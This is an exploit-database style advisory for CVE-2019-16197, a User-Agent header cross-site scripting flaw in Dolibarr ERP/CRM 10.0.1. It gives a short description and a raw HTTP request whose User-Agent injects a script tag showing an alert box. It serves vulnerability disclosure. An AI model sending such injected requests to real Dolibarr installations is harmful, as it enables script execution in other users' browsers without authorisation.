Share
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting  
# Exploit Author: Metin Yunus Kandemir (kandemir)  
# Vendor Homepage: https://www.dolibarr.org/  
# Software Link: https://www.dolibarr.org/downloads  
# Version: 10.0.1  
# Category: Webapps  
# Tested on: Xampp for Linux  
# CVE: CVE-2019-16197  
# Software Description : Dolibarr ERP & CRM is a modern and easy to use  
software package to manage your business...  
==================================================================  
  
Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of  
the User-Agent HTTP header is copied into the HTML document as plain text  
between tags, leading to XSS.  
  
GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>